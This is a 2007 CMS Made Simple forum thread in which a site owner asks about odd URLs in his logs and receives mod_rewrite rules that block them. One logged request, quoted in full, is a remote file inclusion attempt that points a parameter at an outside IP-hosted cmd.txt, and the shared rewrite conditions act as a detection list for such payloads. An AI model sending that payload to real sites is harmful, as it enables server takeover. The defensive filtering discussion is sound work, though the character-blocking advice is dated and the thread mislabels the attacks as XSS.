[solved] How save is CMSMS against XSS?

SimonSchaufi · Post by **SimonSchaufi** » Wed Aug 22, 2007 7:54 am

Hi all!
Since i have installed Visitorstats, i see who is visiting my website. I have really many visitors who are trying to hack the CMS using Crosssite Scripting. Most of them are trying to use external URLs as page alias like:

http://www.example.org/index.php?page=h ... ml?&cmd=id
or
http://www.example.org/index.php?page=h ... 1/find.jpg

What are they acctually trying by typing this url?

If you know how the hackers are trying to hack your site, you can protect your homepage more.

Pierre M. · Post by **Pierre M.** » Wed Aug 22, 2007 10:06 am

Hello,

have a look at release notes, release annoncements or devblog : the coders are doing their best to harden CMSms and avoid potential XSS exploits. For example, if the code cleans page aliases (and other parameters) before using them, you shouldn't mind about odd aliases.

BTW : do you have mod_rewrite enabled ? odd URLs can be stopped at the webserver level before they reach PHP/CMSms.

Pierre M.

SimonSchaufi · Post by **SimonSchaufi** » Wed Aug 22, 2007 10:12 am

yes, i have enabled it but i dont know how to use mod_rewrite apart from the example that is already included in CMSMS!

could you give a link or help me?

Thanx!

Pierre M. · Post by **Pierre M.** » Wed Aug 22, 2007 10:21 am

I don't know about VisitorStats.
Have a look at your actual webserver access logs. There should be only nices URLs : w.site.net/some/path/page.html
There are information about URL rewriting in post intall optional settings.
If you want to filter at the webserver level, please read http://httpd.apache.org/docs/2.2/
And remind us to provide some hardening rules in next provided .htaccess sample

Pierre M.

SimonSchaufi · Post by **SimonSchaufi** » Thu Aug 30, 2007 9:53 pm

I have not yet found a solution but i am googling and googling...

I am collecting links for everybody who is interested in the same:

English Links:
http://f0rked.com/articles/mod_rewrite
http://www.workingwith.me.uk/articles/s ... od_rewrite

German links (sorry but maybe some Germans are comming to this thread because i am German, too

):
http://forum.oesterchat.com/phpBB2/viewtopic.php?t=1468
http://www.bsi.de/literat/studien/sistu ... 3.pdf  - Seite 112

My newest hack try was :

/index.php?page=guestbook///oneadmin/config.php?path[docroot]=http://211.155.235.169/sewam/cmd.txt?

Thanx for the visitorstats module! I love it!

Pierre M. · Post by **Pierre M.** » Fri Aug 31, 2007 1:38 pm

Hello again,

here are some official mod_rewrite pointers :
http://httpd.apache.org/docs/2.2/mod/mod_rewrite.html
http://httpd.apache.org/docs/2.2/rewrite/
http://httpd.apache.org/docs/2.2/misc/rewriteguide.html
http://httpd.apache.org/docs/2.2/rewrit ... guide.html
http://httpd.apache.org/docs/2.2/rewrit ... anced.html

SimonSchaufi wrote: /index.php?page=guestbook///oneadmin/config.php?path[docroot]=http://211.155.235.169/sewam/cmd.txt?

According to the above links, you can block such requests at the webserver level before they reach PHP/CMSms :

Code: Select all

# have a custom forbidden error message
ErrorDocument 403 /403-forbidden.html

RewriteEngine on

#IF the URI contains a ":"
RewriteCond %{REQUEST_URI} \: [OR]
#OR if the URI contains a "["
RewriteCond %{REQUEST_URI} \[ [OR]
#add as much filters as your want...
RewriteCond %{REQUEST_URI} \]

#THEN whatever the request, don't process it, send a 403.
RewriteRule ^.*$ - [F,L]

#put your usual .htaccess stuf after this line

May be this is not useable "as is" and you should tune it according to your context.

Pierre M.

SimonSchaufi · Post by **SimonSchaufi** » Fri Aug 31, 2007 3:18 pm

thank you, thank you, thank you!

For others: if you have pretty urls enabled, you need to remove the red part!

well, my own works only with "QUERY_STRING":

RewriteEngine on

#IF the URI contains a "http:"
RewriteCond %{QUERY_STRING} http\: [OR]

#: alone could make problems in the admin area or if you have installed dokuwiki for example in a subfolder

#OR if the URI contains a "["
RewriteCond %{QUERY_STRING} \[ [OR]

#OR if the URI contains a "]"
RewriteCond %{QUERY_STRING} \] [OR]

#OR if the URI contains a "/"
RewriteCond %{QUERY_STRING} \/

#add as much filters as your want...

#THEN whatever the request, don't process it, send a 403.
RewriteRule ^.*$ - [F,L]

SimonSchaufi · Post by **SimonSchaufi** » Mon Sep 03, 2007 7:22 am

ok, one more question because a little problem came up after this rewrite:

if i type a subdomain for example:

http://sub.example.org/webmail but the folder doesnt exist, it also tries

http://www.example.org/webmail but i dont want that!

Instead i want a 404 ERROR that the folder doesnt exists. what must i modify here: RewriteRule ^.*$ - [F,L]

Pierre M. · Post by **Pierre M.** » Mon Sep 03, 2007 1:26 pm

Hello,

then, there is a serious problem in your hosting : A.d.com and B.d.com are separate things.

A request to A.d.com/xyz should never ever "try also" B.d.com/xyz (even if A and B are at the same hosting provider, even 2 virtualhosts on the same computer).
Just imagine : bank.d.com/checkpassword "also ties" thief.d.com/checkpassword

Computers have no will. If this one "also tries" things, you have configured it to do so. You should fix this asap.

Pierre M.

SimonSchaufi · Post by **SimonSchaufi** » Thu Sep 06, 2007 8:26 pm

ok, I only get a redirect from webmail to the port where the webmail is but other folders are working properly with an error. Puh.
but i dont know why this redirect is setup.

CMS Made Simple Forums

[solved] How save is CMSMS against XSS?

[solved] How save is CMSMS against XSS?

Re: How save is CMSMS against XSS?

Re: How save is CMSMS against XSS?

Re: How save is CMSMS against XSS?

Re: How save is CMSMS against XSS?

Re: How save is CMSMS against XSS?

Re: How save is CMSMS against XSS?

Re: [solved] How save is CMSMS against XSS?

Re: [solved] How save is CMSMS against XSS?

Re: [solved] How save is CMSMS against XSS?